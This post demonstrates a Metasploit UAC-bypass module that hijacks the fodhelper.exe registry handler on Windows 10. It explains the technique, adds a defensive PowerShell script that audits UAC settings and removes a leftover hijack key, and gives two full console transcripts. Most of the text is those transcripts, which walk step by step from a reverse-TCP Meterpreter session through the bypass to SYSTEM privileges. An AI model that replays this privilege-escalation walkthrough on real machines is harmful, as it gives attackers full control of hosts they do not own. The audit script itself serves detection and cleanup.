
UAC bypass module for Windows 10 – Metasploit

This module exploits a recently disclosed UAC bypass on Windows 10 that was unpatched at the time of writing (the transcripts below were recorded in June 2017 against build 10240).
By editing a registry key and then launching fodhelper.exe, a Microsoft-signed binary that auto-elevates, it obtains a high-integrity Meterpreter session without dropping any file to disk. The module writes the registry keys, starts fodhelper.exe through cmd.exe, catches the elevated stage and then removes the keys again.
The technique is closely related to the bypassuac_eventvwr module, which hijacks a different auto-elevating binary in the same way. The module's own pre-flight checks in the output below show the two preconditions: the current user must be a member of the local Administrators group (the initial session runs under the filtered, medium-integrity token, which is why getsystem fails with "The environment is incorrect" before the bypass), and UAC must not be set to "Always notify". Also note that the only listed target is "Windows x86", so the elevated session is x86/windows in both runs, including the one started from an x64 Meterpreter; once it is elevated, getsystem succeeds with named-pipe impersonation.
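The following PowerShell script is an added example, not code from the original post or from the Metasploit module; it does not perform the bypass. It reproduces the checks the module prints ("UAC is Enabled, checking level...", "Part of Administrators group!", "UAC is set to Default") and looks for a staged or leftover fodhelper hijack in the current user's hive, which is what a defender or a tester cleaning up after a failed run wants. Two things are assumptions because the post does not state them: the hijacked handler path HKCU:\Software\Classes\ms-settings\Shell\Open\command (the location used in public descriptions of the fodhelper technique) and the mapping of the module's "level" to the ConsentPromptBehaviorAdmin policy value. Run it on the target as the user whose session you hold (for example from a Meterpreter shell).

```powershell
# Added audit script; not part of the Metasploit module and not the bypass itself.
# ASSUMPTIONS (not stated in the post): the hijacked handler lives at
# HKCU:\Software\Classes\ms-settings\Shell\Open\command, and the UAC level the
# module reports corresponds to ConsentPromptBehaviorAdmin under Policies\System.

$UacPolicyKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
$HijackKey    = 'HKCU:\Software\Classes\ms-settings\Shell\Open\command'

function Get-UacState {
    $p = Get-ItemProperty -Path $UacPolicyKey
    # ConsentPromptBehaviorAdmin: 5 = "Default" slider (Windows binaries whose manifest
    # has autoElevate=true, such as fodhelper.exe, elevate with no prompt);
    # 1-4 = "Always notify" variants (every elevation prompts); 0 = never prompt.
    $level = switch ([int]$p.ConsentPromptBehaviorAdmin) {
        0       { 'Never notify' }
        5       { 'Default' }
        default { 'Always notify' }
    }
    [pscustomobject]@{
        UacEnabled     = ([int]$p.EnableLUA -eq 1)
        Level          = $level
        # Same conclusion the module prints as "BypassUAC can bypass this setting":
        # auto-elevation only helps when UAC is at Default or never prompts at all.
        BypassPossible = ([int]$p.EnableLUA -eq 1 -and $level -ne 'Always notify')
    }
}

function Test-LocalAdminMember {
    # Equivalent of "[+] Part of Administrators group!". whoami still lists the
    # group in a filtered (medium integrity) token, where it is marked
    # "Group used for deny only"; that filtered token is what the bypass targets.
    $rows  = whoami /groups /fo csv | ConvertFrom-Csv
    $admin = $rows | Where-Object { $_.SID -eq 'S-1-5-32-544' }
    [pscustomobject]@{
        IsMember      = [bool]$admin
        TokenFiltered = [bool]($admin -and $admin.Attributes -match 'deny only')
    }
}

function Get-FodhelperHijack {
    # No ms-settings handler exists under HKCU\Software\Classes on a clean system;
    # its presence means a fodhelper-style bypass was staged or not cleaned up.
    if (-not (Test-Path $HijackKey)) { return $null }
    $v = Get-ItemProperty -Path $HijackKey
    [pscustomobject]@{
        Command         = $v.'(default)'
        DelegateExecute = $v.DelegateExecute   # empty string makes the shell run Command directly
    }
}

function Remove-FodhelperHijack {
    # Mirrors the module's "cleaning up registry keys" step for a leftover key.
    Remove-Item -Path 'HKCU:\Software\Classes\ms-settings' -Recurse -Force -ErrorAction SilentlyContinue
}

$uac    = Get-UacState
$member = Test-LocalAdminMember
$hijack = Get-FodhelperHijack

'UAC enabled: {0}  level: {1}  bypassable: {2}' -f $uac.UacEnabled, $uac.Level, $uac.BypassPossible
'Administrators member: {0}  (filtered token: {1})' -f $member.IsMember, $member.TokenFiltered
if ($hijack) {
    "HIJACK STAGED at {0}: (default)='{1}' DelegateExecute='{2}'" -f $HijackKey, $hijack.Command, $hijack.DelegateExecute
} else {
    'No ms-settings handler under HKCU (nothing staged)'
}
```

If the last line reports a staged handler after a run of the module, call Remove-FodhelperHijack; the module normally does this itself, but a session that dies between "Configuring payload and stager registry keys" and the cleanup message leaves the key behind, and a persistent HKCU handler is a loud indicator for anyone auditing the host.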

Windows 10 x64 with x86 payload

msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST        yes       The listen address
   LPORT     4567             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > run

[*] Started reverse TCP handler on :4567 
[*] Starting the payload handler...
[*] Sending stage (957487 bytes) to 
[*] Meterpreter session 1 opened (:4567 -> :49422) at 2017-06-01 10:05:04 -0500

meterpreter > sysinfo
Computer        : DESKTOP-AI9785J
OS              : Windows 10 (Build 10240).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: DESKTOP-AI9785J\msfuser
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use exploit/windows/local/bypassuac_fodhelper 
msf exploit(bypassuac_fodhelper) > set session 1
session => 1
msf exploit(bypassuac_fodhelper) > show options

Module options (exploit/windows/local/bypassuac_fodhelper):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.


Exploit target:

   Id  Name
   --  ----
   0   Windows x86


msf exploit(bypassuac_fodhelper) > run

[*] Started reverse TCP handler on :4444 
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\Windows\Sysnative\cmd.exe /c C:\Windows\System32\fodhelper.exe
[*] Sending stage (957487 bytes) to 
[*] Meterpreter session 2 opened (:4444 -> :49423) at 2017-06-01 10:06:02 -0500
[*] Cleaining up registry keys ...

meterpreter > getuid
Server username: DESKTOP-AI9785J\msfuser
meterpreter > sysinfo
Computer        : DESKTOP-AI9785J
OS              : Windows 10 (Build 10240).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

Windows 10 x64 with x64 payload

msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST        yes       The listen address
   LPORT     4567             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > run

[*] Started reverse TCP handler on :4567 
[*] Starting the payload handler...
[*] Sending stage (1189423 bytes) to 
[*] Meterpreter session 1 opened (:4567 -> :49424) at 2017-06-01 10:07:48 -0500

meterpreter > sysinfo
Computer        : DESKTOP-AI9785J
OS              : Windows 10 (Build 10240).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuyid
[-] Unknown command: getuyid.
meterpreter > getuid
Server username: DESKTOP-AI9785J\msfuser
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use exploit/windows/local/bypassuac_fodhelper 
msf exploit(bypassuac_fodhelper) > set session 1
session => 1
msf exploit(bypassuac_fodhelper) > run

[*] Started reverse TCP handler on :4444 
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\Windows\system32\cmd.exe /c C:\Windows\System32\fodhelper.exe
[*] Sending stage (957487 bytes) to 
[*] Meterpreter session 2 opened (:4444 -> :49425) at 2017-06-01 10:08:41 -0500
[*] Cleaining up registry keys ...

meterpreter > sysinfo
Computer        : DESKTOP-AI9785J
OS              : Windows 10 (Build 10240).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: DESKTOP-AI9785J\msfuser
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 